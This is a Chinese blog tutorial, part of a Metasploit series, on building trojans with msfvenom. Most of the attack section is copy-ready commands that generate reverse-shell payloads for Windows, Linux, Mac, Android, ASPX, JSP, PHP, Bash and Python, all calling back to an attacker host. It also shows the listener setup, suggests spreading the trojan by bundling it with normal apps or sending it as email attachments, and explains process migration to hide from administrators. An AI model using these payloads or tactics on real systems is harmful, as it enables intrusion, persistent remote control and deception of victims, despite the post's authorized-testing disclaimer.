文章总结: 该文档详细介绍Metasploit框架中msfvenom模块的木马生成技术,包括参数解析、多平台payload生成命令示例(Windows/Linux/Android等)、监听配置及进程迁移等完整攻击流程。文章提供具体的可操作命令和实战演示,但需注意此类技术应仅限于授权安全测试使用。 综合评分: 72 文章分类: 渗透测试,安全工具,红队,恶意软件,实战经验
Metasploit木马生成 | 被安全社区誉为可以“黑掉整个宇宙”的神器-3
原创
d0ublewei d0ublewei
大伯为安全
2024年9月12日 14:14 湖北
在小说阅读器读本章
去阅读
01**
概述
上次我们聊到了通过目标系统漏洞来获取目标的权限,其实我们除了可以通过目标系统的漏洞来获取 meterpreter 之外,还可以直接通过木马获取。
msfvenom 就是 MSF 中用来生成后门木马的模块,在目标机器上执行后门木马,然后在本地配置监听目标即可上线,攻击机即可获得 meterpreter。
msfvenom 是 msfpayload 和 msfencode 的组合,将这两个工具集成在一个框架实例中。
msfvenom 主要生成可执行程序、DLL 文件、Webshell 和 Shellcode 等。
02**
相关参数
-l <type>:列出相关类型(如 payloads, encoders, nops, platforms, archs, encrypt, formats, all)的所有模块信息。 -p <payload>:设置使用的 payload。 -p <payload> --list-options:列出指定的 payload 的相关参数。 -f <format>:设置输出格式。 --encoder <encoder>:设置所使用的编码器。 --service-name <value>:设置生成的二进制服务程序的名称。 --sec-name <value>:设置当生成大的 windows 二进制程序文件时使用的节(section)名。默认是四个随机字母组成的字符串。 --smallest:使用所有的编码器生成尽可能小的 payload。 --encrypt <value>:设置编码或加密 shellcode 的方式。 --encrypt-key <value>:设置加密密钥。 --encrypt-iv <value>:设置加密的初始向量 IV。 -a <arch>:设置 payload 使用的软件架构。 --platform <platform>:设置 payload 使用的平台。 -o <path>:将 payload 保存到指定的文件路径。 -b <list>:设置 payload 中需要避免的字符。 -n <length>:在 payload 中预置指定长度的滑板指令。 -s, --space <length>:设置生成的 payload 的最大文件大小。 --encoder-space <length>:设置编码后的 payload 的最大文件大小。 -i <count>:指定编码的次数。 -c <path> :指定包含额外的 win32 shellcode 的文件路径。 -x <path>:使用一个可执行文件当作模板。 -k:保留模板文件的功能,将 payload 作为线程注入。 -v <value>:为某些特定的输出格式指定变量名。 -t <second>:设置从 STDIN 读取 payload 的最长等待时间(单位为秒)。默认为 30 秒。设置为 0 表示禁用时间限制。 -h:输出帮助页面。
03**
木马生成方法(MSF6)
这里针对不同的目标我们有不同的命令,但仔细看你会发现,命令整体结构其实差不多,区别主要在于目标架构不同。
Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f c
Linux
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f macho > shell.macho
Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 R > shell.apk
ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT= 8888 -f aspx -o shell.aspx
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.jsp
PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.php
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.139 LPORT=8888 -f raw > shell.sh
Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f raw > shell.py
04**
举例—木马攻击
MSF 创建监听
首先进入 msf。
msfconsole
然后依次输入以下命令即可。
use exploit/multi/handler
set lhost 192.168.49.139 # 攻击机的IP
set lport 8888 # 攻击机监听的端口
set payload windows/x64/meterpreter/reverse_tcp
run
生成木马
重新开一个窗口,执行以下命令,这里需要注意的是 IP、PORT 要保持和上面创建监听时的值一致,payload 也需要一致。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.139 LPORT=8888 -f exe > shell.exe
然后将木马上传到目标系统
传播木马的常见方法
- 直接通过漏洞上传到目标服务器。
- 把木马和一个正常应用程序捆绑,发布到网上诱导用户下载。
- 社工,通过邮件附件进行传播。
- ……
这里我们简单一点,直接把木马拖到目标系统上,中间的木马传播环节我们就省略了,主要看一下木马上线的效果。
执行即可上线
在目标系统上双击执行木马,然后到 msf 中查看目标是否上线。
#
进程迁移
最后做一下进程迁移主要是为了防止管理员发现木马进程并结束木马进程,所以我们可以通过迁移隐藏一下,增加应急的难度。
而且注入之后原来的木马程序就算被删除了也没关系,只要进程还在,我们的权限就一直在,用起来爽歪歪!
查看木马在目标系统上运行的进程。
getpid
查看目标系统上目前存活的进程,这里会有很多进程,我只截取了前面一部分。
ps
选一个稳定的进程,迁移到这个进程中。
migrate 4084
最后你会发现木马原本的进程 3432 就不存在了。
未完待续……
关注公众号,发送消息”MSF“获取环境和工具
END
往期精彩回顾
数组 | 想要高效存储多个值?这个”变量”能帮你!
干它 | 红队内网渗透-域渗透-1
书接上回 | 红队内网渗透技术-域渗透-2
最后一战 | 红队内网渗透技术-域渗透-3
墙裂推荐!!一键更换Linux优质的软件源和docker源,要多方便有多方便
frp | 开源内网穿透利器,速速用起来
大闹天宫 | 被安全社区誉为可以“黑掉整个宇宙”的神器-1
Metasploit漏洞利用 | 被安全社区誉为可以“黑掉整个宇宙”的神器-2
点击关注
渗透测试
信息安全
安全工具
戳“阅读原文”一起来充电吧!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:大伯为安全 d0ublewei d0ublewei《Metasploit木马生成 | 被安全社区誉为可以“黑掉整个宇宙”的神器-3》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论